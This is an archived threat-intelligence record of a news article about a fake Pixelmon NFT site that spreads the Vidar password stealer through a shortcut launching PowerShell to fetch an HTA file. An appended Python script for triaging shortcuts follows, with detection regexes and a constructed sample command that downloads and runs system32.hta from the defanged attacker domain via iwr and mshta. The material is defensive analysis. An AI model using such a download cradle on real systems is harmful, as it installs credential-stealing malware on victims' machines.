{
	"id": "dd7dbfdb-8eb4-432a-96e4-3b629eb683d4",
	"created_at": "2026-04-06T00:11:59.392852Z",
	"updated_at": "2026-04-10T13:11:46.645022Z",
	"deleted_at": null,
	"sha1_hash": "d35699b38632512bd80b8895894c919b80d6e693",
	"title": "Fake Pixelmon NFT site infects you with password-stealing malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2401726,
	"plain_text": "Fake Pixelmon NFT site infects you with password-stealing malware\r\nBy Lawrence Abrams\r\nPublished: 2022-05-15 · Archived: 2026-04-05 17:20:15 UTC\r\nA fake Pixelmon NFT site entices fans with free tokens and collectibles while infecting them with malware that steals their cryptocurrency wallets.\r\nPixelmon is a popular NFT project whose roadmap includes creating an online metaverse game where you can collect, train, and battle other players using pixelmon pets.\r\nWith close to 200,000 Twitter followers and over 25,000 Discord members, the project has garnered a lot of interest.\r\nImpersonating the Pixelmon project\r\nTo take advantage of this interest, threat actors have copied the legitimate pixelmon.club website and created a fake version at pixelmon[.]pw to distribute malware.\r\nThis site is almost a replica of the legitimate site, but instead of offering a demo of the project's game, the malicious site offers executables that install password-stealing malware on a device.\r\nFake Pixelmon website\r\nSource: BleepingComputer\r\nThe site is offering a file called Installer.zip that contains an executable that appears to be corrupt and does not infect users with any malware.\r\nHowever, MalwareHunterTeam, who first discovered this malicious site, found other malicious files distributed by the site that allowed us to see what malware it was spreading.\r\nOne of the files distributed by this malicious site is setup.zip, which contains the setup.lnk file. Setup.lnk is a Windows shortcut that will execute a PowerShell command to download a system32.hta file (an HTML Application, which Windows runs with mshta.exe) from pixelmon[.]pw.\r\nSetup.lnk contents\r\nSource: BleepingComputer\r\nWhen BleepingComputer tested these malicious payloads, the System32.hta file downloaded Vidar, a password-stealing malware that is not as commonly used as it was in the past. This was confirmed by security researcher Fumik0_, who has previously analyzed this malware family.\r\nWhen executed, the threat actor's Vidar sample will connect to a Telegram channel and retrieve the IP address of the malware's command and control (C2) server.\r\nTelegram channel containing C2 IP address\r\nSource: BleepingComputer\r\nThe malware will then retrieve a configuration command from the C2 and download further modules used to steal data from the infected device.\r\nThe Vidar malware can steal passwords from browsers and applications and search a computer for files that match specific names, which are then uploaded to the threat actor.\r\nAs you can see from the malware configuration below, the C2 instructs the malware to search for and steal various files, including text files, cryptocurrency wallets, backups, codes, password files, and authentication files.\r\nConfiguration commands retrieved from the C2 server\r\nSource: BleepingComputer\r\nAs this is an NFT site, the expectation is that visitors will have cryptocurrency wallets installed on their computers. Because of this, the threat actors emphasize searching for and stealing files related to cryptocurrency.\r\nWhile the site is currently not distributing a working payload, BleepingComputer has seen evidence that the threat actors continue to modify the site over the past few days, as payloads that were available two days ago are no longer present.\r\nGiven the activity on the site, we can expect this campaign to remain active and for working payloads to be added soon.\r\nWith NFT projects being overwhelmed with scams designed to steal your cryptocurrency, you should always triple-check that the URL you are visiting is, in fact, related to the project you are interested in.\r\nFurthermore, never execute any executables from unknown websites without first scanning them with antivirus software or using VirusTotal.\r\nSource: https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/"
	],
	"report_names": [
		"fake-pixelmon-nft-site-infects-you-with-password-stealing-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434319,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d35699b38632512bd80b8895894c919b80d6e693.pdf",
		"text": "https://archive.orkl.eu/d35699b38632512bd80b8895894c919b80d6e693.txt",
		"img": "https://archive.orkl.eu/d35699b38632512bd80b8895894c919b80d6e693.jpg"
	}
}
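The article's infection chain starts with a Windows shortcut (setup.lnk) whose embedded command launches PowerShell to fetch a remote .hta. As an added example that is not part of the BleepingComputer article and not code from Pixelmon, MalwareHunterTeam or Fumik0_, the Python below parses the target path and arguments stored in a .lnk file's StringData section and flags the shortcut-to-PowerShell-to-HTA download-cradle shape. The two sample shortcuts, their command lines and the defanged domain spelling are constructed stand-ins (the article shows the real command line only as an image), and the indicator list and two-hit threshold are heuristic assumptions, not a vetted signature.

```python
"""Triage a Windows .lnk (Shell Link) for a PowerShell download cradle.

Added example, not code from the article or anyone it names. It parses the
StringData of a .lnk (relative path, working dir, arguments) and scores the
command line against download-cradle indicators, the shape the article
describes (shortcut -> PowerShell -> remote .hta). Samples are constructed.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HEADER_SIZE = 0x4C
# LinkFlags bits, low to high: IDList, LinkInfo, Name, RelativePath,
# WorkingDir, Arguments, IconLocation, IsUnicode.
(HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR,
 HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE) = (1 << i for i in range(8))
# StringData entries come in this fixed order, each present only if its flag is set.
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))

def build_lnk(relative_path, arguments="", working_dir="", is_unicode=True):
    """Build a minimal .lnk: 76-byte header plus StringData, no IDList/LinkInfo."""
    values = {"relative_path": relative_path, "working_dir": working_dir,
              "arguments": arguments}
    flags, body = (IS_UNICODE if is_unicode else 0), b""
    for flag, name in STRING_DATA:
        text = values.get(name)
        if text:  # CountCharacters (uint16) then the characters, no terminator
            flags |= flag
            body += struct.pack("<H", len(text)) + text.encode(
                "utf-16-le" if is_unicode else "cp1252")
    # HeaderSize, CLSID, LinkFlags, FileAttributes (ARCHIVE), 3 FILETIMEs,
    # FileSize, IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3.
    return struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                       0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0) + body

def parse_lnk(data):
    """Return the StringData fields of a .lnk as a dict; ValueError if malformed."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    is_unicode = bool(flags & IS_UNICODE)
    pos, fields = HEADER_SIZE, {}
    try:
        if flags & HAS_ID_LIST:    # IDListSize (uint16) followed by the IDList
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINK_INFO:  # LinkInfoSize (uint32) counts itself
            pos += struct.unpack_from("<I", data, pos)[0]
        for flag, name in STRING_DATA:
            if flags & flag:
                count = struct.unpack_from("<H", data, pos)[0]
                size = count * 2 if is_unicode else count
                raw = data[pos + 2:pos + 2 + size]
                if len(raw) != size:
                    raise ValueError("truncated StringData")
                fields[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
                pos += 2 + size
    except struct.error as exc:
        raise ValueError("truncated Shell Link file") from exc
    return fields

# Any one of these is common in legitimate shortcuts; two or more on a single
# command line is the download-cradle shape worth escalating (assumed threshold).
CRADLE_INDICATORS = (
    ("powershell-host", re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    ("encoded-command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("web-download", re.compile(r"\b(DownloadString|DownloadFile|Invoke-WebRequest"
                                r"|iwr|Invoke-RestMethod|irm|curl|wget)\b", re.I)),
    ("invoke-expression", re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
    ("hta-payload", re.compile(r"(\bmshta(\.exe)?\b|\.hta\b)", re.I)),
    ("remote-url", re.compile(r"\bhttps?://", re.I)),
)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.I)

def assess_shortcut(data):
    """Parse a .lnk and report its command line, matched indicators and verdict."""
    fields = parse_lnk(data)
    command = " ".join(v for v in (fields.get("relative_path"),
                                   fields.get("arguments")) if v)
    hits = [name for name, rx in CRADLE_INDICATORS if rx.search(command)]
    return {"command": command, "indicators": hits, "urls": URL_RE.findall(command),
            "verdict": "suspicious" if len(hits) >= 2 else "no cradle indicators"}

# Constructed samples, not the real campaign files. The first mimics the chain
# the article describes; its command line is invented and the domain defanged.
CRADLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -nop -c "iwr http://pixelmon[.]pw/system32.hta -OutFile '
    r'$env:TEMP\system32.hta; mshta $env:TEMP\system32.hta"')
BENIGN_LNK = build_lnk(r"..\..\Documents\notes.txt", is_unicode=False)  # ANSI strings

if __name__ == "__main__":
    for label, blob in (("cradle", CRADLE_LNK), ("benign", BENIGN_LNK)):
        print(label, assess_shortcut(blob))
```

On a real sample, read the file bytes and pass them to assess_shortcut; the parser skips over the IDList and LinkInfo blocks rather than decoding them, so a shortcut whose target lives only in the IDList (no RelativePath or Arguments) will come back empty and should be handed to a full LNK parser. The indicator list is deliberately broad so that a defanged or obfuscated URL still trips the web-download and hta-payload checks even when the remote-url one does not.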